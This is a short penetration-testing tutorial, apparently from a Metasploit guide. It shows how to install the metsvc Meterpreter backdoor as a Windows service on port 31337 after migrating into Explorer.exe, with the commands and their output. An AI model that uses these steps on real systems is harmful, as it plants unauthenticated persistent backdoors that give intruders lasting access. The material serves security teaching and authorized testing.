After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into it for later use. This way, if the service you initially exploited is down or patched, you can still gain access to the system. To read about the original implementation of metsvc, refer to http://www.phreedom.org/software/metsvc/.
Using the metsvc backdoor, you can gain a Meterpreter shell at any point.
One word of warning here before we go any further: metsvc as shown here requires no authentication. This means that anyone that gains access to the port could access your back door! This is not a good thing if you are conducting a penetration test, as this could be a significant risk. In a real world situation, you would either alter the source to require authentication, or filter out remote connections to the port through some other method.
First, we exploit the remote system and migrate to the Explorer.exe process in case the user notices the exploited service is not responding and decides to kill it.
Before installing metsvc, let’s see what options are available to us.
meterpreter > run metsvc -h
-A Automatically start a matching multi/handler to connect to the service
-h This help menu
-r Uninstall an existing Meterpreter service (files must be deleted manually)
Since we’re already connected via a Meterpreter session, we won’t set it to connect back to us right away. We’ll just install the service for now.
meterpreter > run metsvc
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\DOCUME~1\victim\LOCALS~1\Temp\JplTpVnksh...
[*] >> Uploading metsrv.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
[*] * Installing service metsvc
* Starting service
Service metsvc successfully installed.
The service is now installed and waiting for a connection.